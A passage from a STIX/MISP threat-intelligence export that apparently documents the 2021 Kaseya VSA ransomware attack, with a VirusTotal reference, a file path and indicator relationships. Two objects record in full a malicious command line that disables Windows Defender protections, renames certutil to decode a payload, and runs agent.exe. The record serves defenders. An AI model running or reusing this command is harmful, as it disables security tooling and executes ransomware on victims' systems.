"https://www.virustotal.com/gui/file/d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e/detection/f-d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e-1625472737", "category": "Payload delivery", "uuid": "43d4b31b-3140-4f05-8b0e-5f0eedd20103" }, { "type": "text", "object_relation": "detection-ratio", "value": "47/70", "category": "Payload delivery", "uuid": "9d182ba8-8b82-453f-8e0e-91f29ee97d65" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--cd7445c8-4121-45e1-a294-121ec9d35d8e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:19:46.000Z", "modified": "2021-07-05T08:19:46.000Z", "labels": [ "misp:name=\"command-line\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "value", "value": "\"%WINDIR%\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 6258 > nul & %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y %WINDIR%\\System32\\certutil.exe %WINDIR%\\cert.exe & echo %RANDOM% >> %WINDIR%\\cert.exe & %WINDIR%\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt %WINDIR%\\cert.exe & c:\\kworking\\agent.exe", "category": "Other", "uuid": "cbfcd350-0e50-4e7e-a839-f3869a4ae11e" } ], "x_misp_meta_category": "misc", "x_misp_name": "command-line" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--f722ecce-fb4e-44f6-a2ed-f40f4fd96f11", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:19:02.000Z", "modified": "2021-07-05T08:19:02.000Z", "labels": [ 
"misp:name=\"command-line\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "value", "value": "\"%WINDIR%\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 5693 > nul & %WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y %WINDIR%\\System32\\certutil.exe %WINDIR%\\cert.exe & echo %RANDOM% >> %WINDIR%\\cert.exe & %WINDIR%\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt %WINDIR%\\cert.exe & c:\\kworking\\agent.exe", "category": "Other", "uuid": "d27857cb-272f-434f-8236-5a65e4c12acf" } ], "x_misp_meta_category": "misc", "x_misp_name": "command-line" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--0ff15772-0b74-45a7-b805-f2a4363639d1", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2021-07-05T08:18:04.000Z", "modified": "2021-07-05T08:18:04.000Z", "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "fullpath", "value": "%PROGRAMFILES%\\(x86)\\Kaseya\\\\AgentMon.exe", "category": "Other", "uuid": "a94932af-2266-4478-860f-a16e0162f761" } ], "x_misp_meta_category": "file", "x_misp_name": "file" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1b551a7c-1d52-497a-8eb7-ddc39717c2a1", "created": "2021-07-05T08:02:41.000Z", "modified": "2021-07-05T08:02:41.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--382db752-d40a-44b4-8043-8ed41ad534df", "target_ref": "x-misp-object--f5e08151-622f-4b0f-9a5f-3b329b8da50c" }, { "type": "relationship", "spec_version": "2.1", "id": 
"relationship--f1e68dce-2415-4c97-8dc5-8462985248dc", "created": "2021-07-05T08:02:41.000Z", "modified": "2021-07-05T08:02:41.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--b5e68470-eac8-4708-9c02-bd24d67639d9", "target_ref": "x-misp-object--6b906ba0-33c1-4070-8962-49359d7ab1e1" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3154082f-b1cd-4d18-8139-e5a25682aa21", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--b5e68470-eac8-4708-9c02-bd24d67639d9", "target_ref": "x-misp-object--e6a7fd5d-ff89-4a3f-840f-892e99de748b" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4d8d7fa4-3bea-4bf9-97e0-d585b262980a", "created": "2021-07-05T08:15:24.000Z", "modified": "2021-07-05T08:15:24.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--80fca50b-89b9-4331-9b9a-6a62e7080126", "target_ref": "x-misp-object--67af034f-5173-445b-ae08-1f1a7e9a7f87" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1a3e175a-43e5-4c38-bd6f-6c657acd3785", "created": "2021-07-05T08:15:25.000Z", "modified": "2021-07-05T08:15:25.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--a855e025-6cbb-4c93-9585-95121ea5c55c", "target_ref": "x-misp-object--f42f63de-36c2-41d3-86d1-d1e3e3508da1" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a37c72bd-2565-4cae-93f4-f56a5b57d4d7", "created": "2021-07-05T08:19:46.000Z", "modified": "2021-07-05T08:19:46.000Z", "relationship_type": "child-of", "source_ref": "x-misp-object--cd7445c8-4121-45e1-a294-121ec9d35d8e", "target_ref": "x-misp-object--0ff15772-0b74-45a7-b805-f2a4363639d1" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--975070c8-f353-432c-9f2d-9c7383661ec0", "created": "2021-07-05T08:19:02.000Z", "modified": "2021-07-05T08:19:02.000Z", "relationship_type": "child-of", "source_ref": 
"x-misp-object--f722ecce-fb4e-44f6-a2ed-f40f4fd96f11", "target_ref": "x-misp-object--0ff15772-0b74-45a7-b805-f2a4363639d1" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }